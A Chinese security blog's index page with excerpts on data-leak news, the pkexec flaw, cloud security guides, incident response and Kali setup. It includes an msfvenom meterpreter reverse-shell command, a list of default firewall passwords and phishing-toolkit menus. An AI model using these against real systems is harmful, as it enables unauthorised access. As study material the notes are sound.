sherlockmj的博客

一月数据泄露事件疑似超2亿国内个人信息在国外暗网论坛兜售1月5日，国外安全研究团队Cyble发现多个帖子正在出售与中国公民有关的个人数据，经分析可能来自微博、QQ等多个社交媒体，本次发现的几个帖子中与中国公民有关的记录总数超过2亿。其中还发现了大量湖北省“公安县”的公民数据。其中一个帖子，威胁者公布了公安县999名中国公民的户口登记样本数据，以作为黑客攻击的证据。并表示共有730万中国公民的数据可供出售，包括身份证，性别，姓名，出生日期，手机号，地址和邮编等记录。全国首例适用民法典的个人..

Qualys研究团队在polkit的pkexec中发现了一个内存损坏漏洞，这是一个SUID根程序，默认情况下安装在每个主要的Linux发行版上。此漏洞很容易被利用，任何非特权用户都可以通过在其默认配置中利用此漏洞来获得易受攻击主机的完全 root 权限。关于 Polkit pkexec for LinuxPolkit（以前称为 PolicyKit）是用于在类 Unix 操作系统中控制系统范围权限的组件。它为非特权进程提供了一种有组织的方式来与特权进程进行通信。也可以使用 polkit 以...

风险风险政策和组织风险技术风险法律风险非云特有风险脆弱性资产分类政策和组织风险厂商锁定治理缺失合规性挑战由于共同租户活动而导致商业信誉丧失云服务终止或失败云提供者获得供应链失效技术风险资源耗尽、不足或超卖隔离失效云提供者恶意内部人员-滥用高级特权角色管理平面缺陷（操纵，基础设施的可能性）拦截传输中的数据上传/下载，云内数据泄露不安全或无效的数据删除分布式拒绝服务DDOS经济拒绝服务EDOS加密秘钥丢失承担恶意探测或扫描服务引擎损坏客户加固程序与云环境之间的冲突法律风险传票和电子取证管辖权变更的风险数据保护风

[[ENISA]]CSA云安全指南V4.0 D11 D12D13 安全即服务安全即服务（SecaaS）提供商提供安全作为云服务需要符合标准提供安全产品服务其服务必须满足域1中提及的美国国家标准与技术研究员（NIS）的云计算基本特性优势云计算优势人员配置和专业知识智能共享部署灵活客户无感知伸缩成本问题能见度不足监管差异处理监管数据数据泄露更换供应商迁移到Scaas提供的安全及服务分类身份、授权和访问管理服务策略执行点PEP-as-a-service策略决策点PDP-as-a-service策略接入点PAP-a

CSA云安全指南V4.0 D11 D12D11数据安全和加密数据安全控制控制什么时候进入云端保护和管理云中的数据访问控制加密架构监控/告警（使用情况、配置、生命周期）附加控制-云提供商相关的具体产品、服务、平台、DLP以及企业权限管理执行信息生命周期管理安全管理数据位置、归属地确保合规性，人工审计（日志，配置）备份和业务连续性云数据存储类型对象存储卷存储数据库应用程序/平台管理数据迁移CASB云访问和安全代理URL过滤DLP保护数据安全传输SFTPTLS云数据访问控制管理平面公共和内部提供商默认策略是访问控

CSA云安全指南V4.0 D1 D2CSA云安全指南V4.0 D1 D2D1:云计算概念和体系架构定义云计算云逻辑模型基础设施元结构信息结构应用结构云概念、架构和参考模型IAASPAASSAAS云安全性和合规管理范围、职责和模型软件即服务平台即服务基础设施即服务共享责任云安全模型概念模型或框架控制模型或框架参考架构设计模式推荐模型云安全流程模型运行域管理域D2：治理与企业风险管理云治理的工具合同供应商评估合规报告企业风险管理(ERM)风险容忍度服务模式和部署方式的影响公有云私有云混合云评估云风险云风险管理的

命令执行漏洞常见的分析方式下载源代码并部署测试环境结合手工和工具对程序进行代码审计攻击利用定义通过浏览器或者辅助程序提交执行命令，因为未对执行参数过滤，导致没有绝对命令的 情况下执行命令。常见利用函数system(),eval(),exec()分类代码层商业应用需要执行的命令系统层bash破壳漏洞，控制bash的环境变量第三方组件wordpress中magemagick的 图片处理，java中的struts2/elasticsearch暴力破解.

生成shellcodemsfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.241.132 lport=8080 -e-p：指定payload；-e：指定编码方式；-i：编译次数；-b：去除指定代码，一般都是空代码或者错误代码；lhost：指定本机监听端口；-f：指定生成格式；-o：指定生成输出位置；shellcode执行盒执行https://github.com/clinicallyinane/shell

应急响应windows入侵排查常见的应急响应事件分类：web入侵：网页挂马，主页篡改，webshell 系统入侵：病毒木马，勒索软件，远控后门 网络攻击：ddos攻击，dns劫持，arp欺骗入侵排查思路一、检查系统账号安全检查服务器是否有弱口令，远程管理端口是否对公网开放。（询问相关服务器管理员）检查服务器是否有可以账号，新增账号。（cmd窗口输入lusrmgr.msc，查看是否有新增或可疑账号，如果管理员组administrator有新增账号请立刻删除或禁用）查看服务

无线的发展二战1971年封包式技术IEEE 802.11标准wifi,CDMA,3G,4G(LTE)，蓝牙无线网络的分类高频抗干扰能力差wireless personal area network（个人无线网络）如蓝牙wireless local area network（无线局域网络）wireless metro area network（无线局域网络）wireless wide area network（无线广域网络）wlanwireless local area

安全物理环境：物理位置选择、物理访问控制、防盗窃和防破坏、防雷击、防火、防水和防潮、防静电、湿温度控制、电力供应、电磁防护安全通信网络网络架构、通信传输、可信验证安全区域边界边界防护、访问控制、入侵防范、恶意代码和垃圾邮件防范、安全审计、可信验证安全计算环境身份鉴别、访问控制、安全审计、入侵防范、恶意代码防范、可信验证、身份鉴别、访问控制、安全审计、入侵防范、恶意代码防范、可信验证、身份鉴别、访问控制、安全审计、入侵防范、恶意代码防范、可信验证安全管理中心系统管理、审计管理、安全管理、集中

防火墙厂商默认地址用户名密码天融信192.168.1.254supermantalent/talent@123华为192.168.0.1:8443adminHuawei@123/Admin@123网御星云一代防火墙https://10.1.5.254:8889administratoradministrator/leadsec@7766/Secu@7766网闸厂商默认地址用户名密码网御星云内侧10.0.0.1:8889

# 面板## 接口连接状态### 绿色- 物理UP，protocol up，全双工### 黄色- 物理UP，protocol up，半双工### 红色- 物理UP，protocol down### 黑色- 物理DOWN## 接口工作状态## license### 分类- 用途 - 商用COMM - 非商用DEMO（限时）- 内容 - 功能型 - 资源型 - 资源授权的最大数量不可以超过机器所支持的数量- 网络 - 单机...

social-engineer toolkit输入setoolkit进入软件1）社会工程攻击2）快速跟踪渗透测试3）第三方模块4）更新社会工程工具包5）更新set设置6）帮助作者关于99）退出试一下社会工程攻击1） 鱼叉式网络钓鱼攻击载体2） 网站攻击载体3） 感染性介质发生器4） 创建有效负载和侦听器5） 群发邮件攻击6） 基于Arduino的攻击向量7） 无线接入点攻击向量8） QRCode生成器攻击向量9） Powersh

kali的命令和一般的重启网络命令稍有不同普通系统：systemctl restart network（有补全）kali：systemctl restart networking （无补全）重启之后，地址出来了，ping主机也通了，这里采用的是nat模式。

想看一下自身网卡和ip地址信息，却发现看不了。我猜可能是网络工具没有安装。命令行输入apt-get -y install net-tools安装之后问题就解决了。

因为之前重启过机器，发现开机启动nessus失败。所以这里手动开启nessus，在界面配置。输入主机名后https://kali:8834/可以看到这样的一个网页选择第一个进入界面，输入激活码，设置用户名和密码设置好就会开始自行安装（漫长的等待）安装完成之后这样就成功配置好了。...

1.官网下载注意一般都是64位，第一个是kali linux 32位用的，所以不要下错了。2.安装dpkg -i 文件名如果出现报错dpkg: 警告: 在 PATH 环境变量中找不到 ldconfig 或没有可执行权限dpkg: 警告: 在 PATH 环境变量中找不到 start-stop-daemon 或没有可执行权限dpkg: 错误: 2 在环境变量 PATH 中找不到该程序，或不可执行提示：root 的 PATH 环境变量通常应当包含 /usr/local/sbin、/usr

dpkg: 警告: 在 PATH 环境变量中找不到 ldconfig 或没有可执行权限dpkg: 警告: 在 PATH 环境变量中找不到 start-stop-daemon 或没有可执行权限dpkg: 错误: 2 在环境变量 PATH 中找不到该程序，或不可执行提示：root 的 PATH 环境变量通常应当包含 /usr/local/sbin、/usr/sbin 和 /sbin出现这个错误时应当vi ~/.bashrcexport PATH=/usr/loca/sbin:/usr/sb

刚开始使用kali是没有root用户的，这时候只需要sudo passwd输入当前用户的密码：输入新的密码：确认新的密码：这样就完成了密码的设置。

主要现象：虚拟网卡显示不出来，dhcp分配获取地址失败。一般方法：卸载重装、重启，但没有效果。新的解决方法：1.卸载vmare2.使用ccleaner修复注册列表。（修复的意思就是删除）3.win+r输入services.msc把服务里的这两个设置成自启右键——属性——设置自启4.直接安装可以看到虚拟网卡出现了，说明成功...

telnetTelnet协议是TCP/IP协议族中的一员，是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序，用它连接到服务器。终端使用者可以在telnet程序中输入命令，这些命令会在服务器上运行，就像直接在服务器的控制台上输入一样。可以在本地就能控制服务器。要开始一个telnet会话，必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。ftpFTP（File Trans